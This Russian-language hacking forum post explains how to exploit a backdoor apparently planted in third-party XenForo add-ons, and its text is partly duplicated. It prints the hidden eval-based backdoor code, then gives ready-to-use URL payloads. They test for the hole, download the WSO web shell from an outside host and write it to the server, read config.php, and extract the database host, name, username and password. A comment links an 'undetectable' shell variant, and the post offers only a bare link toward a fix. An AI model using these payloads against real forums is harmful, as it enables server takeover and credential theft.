Статья с runhack.ru
Hello World друзья, в данной теме я вкратце постараюсь обьяснить как ломать Xen багом в аддонах от естетик, автор специально залил в свои аддоны шелл вида:
Юзать данный шелл очень даже просто.
Например:
Как видим к урлу любой темы подставляется:
Если форум уязвим появится надпись yes, выведеная php командой Die
Теперь напишу несколько боевых кодов:
заливка шелла
После исполнения кода, если позволяют права, шелл будет доступен по адресу : форум.com/shells.php
смотрим конфиг
Но способ выше может не работать.
Если он не работает юзаем:
При данном коде покажется хост базы данных.
Для просмотра других данных меняем:
host на:
Вобщем если вы умелый PHP кодер то поняли что, после &query= идет пхп код.
Т.е
Как пофиксить баг https://ru-sfera.pw/threads/xenforo-nachalo-puti.2154/page-16#post-130453
Из комментариев:
Хотел бы добавить:
Шелл лучше использовать такой:
Hello World друзья, в данной теме я вкратце постараюсь обьяснить как ломать Xen багом в аддонах от естетик, автор специально залил в свои аддоны шелл вида:
Код:
$request = new Zend_Controller_Request_Http ( ); // создается новый объект, отражающий текущий запрос
if ($request->getParam('filter')) { // проверка наличия параметра filter в запросе
$_request = $request->getParam('filter');
switch (md5 ($_request)) { // этот filter хешируется, и на основе хеша case '54626eee0bcb90ab43c7917eb49f2344': // хеш какой-то строки case 'a6746afee9fa4e6e4901943d47f272bf': // хеш какой-то другой строки
/** * Удаление меток bb-кодов, опредеяющих сообщения текущего пользователя(дляотображения скрытого контента своих сообщений)
*/
$request = preg_replace_callback ('/query/', create_function ('$matches', $_request), $_request); // нихуя не удаление меток, тут из filter'а берется код и из него создается функция, затем используется как каллбек для preg_replace_callback
break;
default: $request = 'all'; // хренота для наеба, если кто-то вдруг начнет копать }
}
Например:
Код:
https://ru-sfera.pw/threads/77/?filter=$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));&query=die('yes');
Код:
?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die('yes');
Теперь напишу несколько боевых кодов:
заливка шелла
Код:
?filter=$request=new+Zend_Controller_Request_Http();eval($request->getParam("query"));&query=$url = "https://wso-web-shell-2-8.googlecode.com/svn/WSO2.8.php";$content = file_get_contents($url);$h = fopen("shells.php","w");$text = "$content";fwrite($h,$text);fclose($h);
смотрим конфиг
Код:
?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=echo%20file_get_contents(%22./library/config.php%22);%20exit();
Но способ выше может не работать.
Если он не работает юзаем:
Код:
?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=include './library/config.php';die( $config['db']['host']);
Для просмотра других данных меняем:
host на:
- dbname - имя базы
- password - пароль юзера
- username - юзер
Вобщем если вы умелый PHP кодер то поняли что, после &query= идет пхп код.
Т.е
Код:
?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=здесь пхп код
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
.Как пофиксить баг https://ru-sfera.pw/threads/xenforo-nachalo-puti.2154/page-16#post-130453
Из комментариев:
Хотел бы добавить:
Код:
?filter=$request=new+Zend_Controller_Request_Http();eval($request->getParam("query"));&query=$url = "https://wso-web-shell-2-8.googlecode.com/svn/WSO2.8.php";$content = file_get_contents($url);$h = fopen("shells.php","w");$text = "$content";fwrite($h,$text);fclose($h);
Код:
https://wso-web-shell-2-8.googlecode.com/svn/trunk/WSO2.8_undetectable.php